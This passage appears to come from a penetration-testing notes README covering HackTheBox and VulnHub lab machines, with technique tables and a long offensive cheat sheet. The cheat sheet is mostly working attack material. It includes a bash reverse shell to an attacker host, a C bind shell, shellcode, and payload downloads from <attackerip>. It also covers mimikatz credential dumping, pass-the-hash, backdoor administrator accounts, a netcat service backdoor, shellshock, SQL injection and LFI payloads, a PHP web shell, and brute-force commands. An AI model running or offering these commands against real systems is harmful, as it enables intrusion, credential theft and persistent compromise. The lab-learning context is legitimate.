[vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_sudoers"></a> #### privesc_sudoers [⇡](#privesc) being able to edit the `/etc/sudoers` file to give a user elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_tmux_rootsession"></a> #### privesc_tmux_rootsession [⇡](#privesc) --- <a name="privesc_windows_ms10_059"></a> #### privesc_windows_ms10_059 [⇡](#privesc) ```shell wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe sharehttp <targetport> certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe nc -nlvp 444 pe.exe <attackerip> 444 ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri --- <a name="privesc_windows_ms11_046"></a> #### privesc_windows_ms11_046 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="privesc_windows_ms14_070"></a> #### privesc_windows_ms14_070 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | --- <a name="privesc_windows_ms15_051"></a> #### privesc_windows_ms15_051 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | --- <a name="privesc_windows_ms16_032"></a> #### privesc_windows_ms16_032 [⇡](#privesc) --- <a name="privesc_windows_ms16_098"></a> #### privesc_windows_ms16_098 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | --- <a name="privesc_windows_upnphost"></a> #### privesc_windows_upnphost [⇡](#privesc) On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service. ```shell msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe # upload pe.exe file to the target system sudo nc -nlvp <attackerport> sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe" sc qc upnphost sc config upnphost obj= ".\LocalSystem" password= "" sc config SSDPSRV start= auto net start SSDPSRV net start upnphost ``` [+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html --- <a name="tips"></a> ## ⚡ Tips [↟](#contents) ### bind shell [🡑](#tips) ``` bs.c #include <sys/socket.h> #include <netinet/in.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char* argv[]) { int host_sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in host_addr; host_addr.sin_family = AF_INET; host_addr.sin_port = htons(atoi(argv[1])); host_addr.sin_addr.s_addr = INADDR_ANY; bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)); listen(host_sock, 0); int client_sock = accept(host_sock, NULL, NULL); dup2(client_sock, 0); dup2(client_sock, 1); dup2(client_sock, 2); execve("/bin/bash", NULL, NULL); } gcc -m32 -o bs bs.c ./bs 4444 ``` ### buffer overflow [🡑](#tips) ``` payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length> pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport> pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address> nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax bad characters: badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") find address for "jmp esp" using mona.py: !mona jmp -r esp -b <list of bad chars> gcc compilation options: linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 -wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support references: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md ``` ### file transfers [🡑](#tips) ``` certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')" python3 -m pyftpdlib -p 21 rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries gzip+xxd: sender: gzip -c < file > file.gz xxd -p file.gz | tr -d '\n' && echo receiver: echo 1f8b...0000 > /tmp/file.gz.hex xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz gunzip -c < /tmp/file.gz > /tmp/file automate file download via windows ftp client: echo open <targetip> >ftp_commands.txt echo anonymous >>ftp_commands.txt echo whatever >>ftp_commands.txt echo binary >>ftp_commands.txt echo get met8888.exe >>ftp_commands.txt echo bye >>ftp_commands.txt ftp -s:ftp_commands.txt create wget.vbs and download netcat: >C:\Windows\d.vbs echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs echo Err.Clear >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs echo http.Open "GET", strURL, False >>C:\Windows\d.vbs echo http.Send >>C:\Windows\d.vbs echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs echo strData = "" >>C:\Windows\d.vbs echo strBuffer = "" >>C:\Windows\d.vbs echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs echo Next >>C:\Windows\d.vbs echo ts.Close >>C:\Windows\d.vbs dir C:\Windows\d.vbs C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe netcat: nc -w3 <targetip> 1234 <file.sent cmd /c nc.exe -l -v -p 1234 >file.rcvd smb (139/tcp, 445/tcp): server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat client: list files: smbclient -L <targetip> --no-pass list files: net view \\<targetip> list files: dir \\<targetip>\shared copy files: copy \\<targetip>\shared\met8888.exe execute files: \\<targetip>\shared\met8888.exe tftp (69/udp): server: atftpd --daemon --port 69 $HOME/toolbox/scripts/shared metasploit: use auxiliary/server/tftp set TFTPROOT $HOME/toolbox/scripts/shared exploit client: download: tftp -i <targetip> GET met8888.exe upload: tftp -i <targetip> PUT hashes.txt install: pkgmgr /iu:"TFTP" ``` ### heartbleed [🡑](#tips) ``` nmap --script=ssl-heartbleed -p <targetport> <targetip> https://github.com/sensepost/heartbleed-poc python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` ### iptables [🡑](#tips) ``` config file: /etc/iptables/rules.v4 ``` ### lfi/rfi/image upload [🡑](#tips) ``` scan: uniscan -u http://<targetip>/ -qweds wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ php b64 leak and command execution: php://filter/convert.base64-encode/resource=<pagename> <?php echo passthru($_GET[cmd]) ?> bypass upload filter: change extension to PHP, PHP3, PHP4, PHP5 add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index notice urls that accept a generic filename as parameter: ?page=file1.php ?page=../../../../../../etc/passwd ?page=../../../../../../windows/system32/drivers/etc/hosts ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8): /etc/passwd /proc/self/status find home username in passwd, locate home directory for user: /var/lib/asterisk/.ssh/id_rsa ``` ### passthehash [🡑](#tips) ``` pth-toolkit: git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd xfreerdp: apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP meterpreter: meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell misc: fgdump.exe /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost ``` ### passwords [🡑](#tips) ``` shadow file structure: $id$salt$password generate shadow file hash: mkpasswd -m md5 password salt mkpasswd -m sha-256 password salt mkpasswd -m sha-512 password salt ``` ### persistence [🡑](#tips) ``` add a new administrator user: net user anderson cooper /add && net localgroup administrators anderson /add add user to rdp group: net localgroup "Remote Desktop Users" anderson /add enable rdp in firewall: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable netsh firewall add portopening TCP <targetport> "RDP" enable rdp via registry (requries reboot): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f is rdp service running: tasklist /svc | findstr /c:TermService start rdp service: net start TermService permanently enable rdp service: sc config TermService start=auto code: useradd.c: #include <stdlib.h> int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } add user: #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } # compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c ``` ### port forward [🡑](#tips) ``` socat: socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 & socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 & plink: plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip> meterpreter: # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip> kali > rdesktop 127.0.0.1:<targetport> ``` ### portknock [🡑](#tips) ``` knock once on port <targetport>/tcp: hping3 <targetip> -S -p <targetport> -c 1 nc -vvvz <targetip> <targetport> knock on multiple tcp ports in a given sequence: hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1 nmap -Pn -sT -r -p666,7000,8890 <targetip> ``` ### restricted shells [🡑](#tips) ``` rbash: bash -i BASH_CMDS[foobar]=/bin/bash;foobar lshell: echo os.system("/bin/bash") ``` ### reverse shell [🡑](#tips) ``` reverse tcp shell from bash: /bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1 make a partially interactive terminal usable: target: python -c "import pty; pty.spawn('/bin/bash')" local: stty raw -echo ; fg target: reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size reverse php shell on windows: https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php ``` ### shellcode [🡑](#tips) ``` /bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` ### shellshock [🡑](#tips) ``` look for /cgi-bin/ directory (incldue 403 code for gobuster scan) check for scripts (-x sh,pl) using gobuster test http header, user-agent probably curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` ### sql injection [🡑](#tips) ``` manual verification: ' or 1=1 -- - ' || 1=1 # or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 find a row where you can place your output: http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 get db version: http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5 get current user: http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5 see all tables: http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables get column names for a specified table: http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users' concat user names and passwords: http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users write to a file: http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile' ``` ### startup scripts [🡑](#tips) ``` chmod +x /foo/bar update-rc.d /foo/bar defaults ``` ### stegnography [🡑](#tips) ``` strings exiftool steghide ``` ### tmux shortcuts [🡑](#tips) ``` prefix: ctrl + b toggle logging: prefix + shift + p screen cap: prefix + alt + p complete history: prefix + alt + shift + p ``` ### tunneling [🡑](#tips) ``` connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>: proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234 ssh john@127.0.0.1 /bin/bash vim /etc/proxychains.conf http <targetip> <targetport> proxychains nmap -sT -p22 <targetip> proxychains ssh <username>@<targetip> /bin/bash forward remote port to local address: plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip> ``` ### windows useful commands [🡑](#tips) ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` <a name="tools"></a> ## 💥 Tools [↟](#contents) ### burp [🡑](#tools) ``` set an upstream proxy within burp: burp > user options > upstream proxy > <targetip>:<targetport> ``` ### cewl [🡑](#tools) ``` cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null ``` ### fcrackzip [🡑](#tools) ``` fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip> unzip -o -P "password" <file.zip> ``` ### gobuster [🡑](#tools) ``` start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist search file extension: gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" quick: gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux full/comprehensive: gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ippsec: gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl cgi list: /usr/share/seclists/Discovery/Web-Content/CGIs.txt ``` ### hashcat [🡑](#tools) ``` hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt ``` ### hydra [🡑](#tools) ``` generic: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> ftp: hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp http: hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V with cookie: hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here' pop3: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3 rdp: hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip> smtp: hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp ssh: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh wordpress: hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR" ``` ### john [🡑](#tools) ``` create custom wordlist: john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr crack shadow hashes: unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed crack md5 hashes: john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes ``` ### kernel module [🡑](#tools) ``` rootkit: 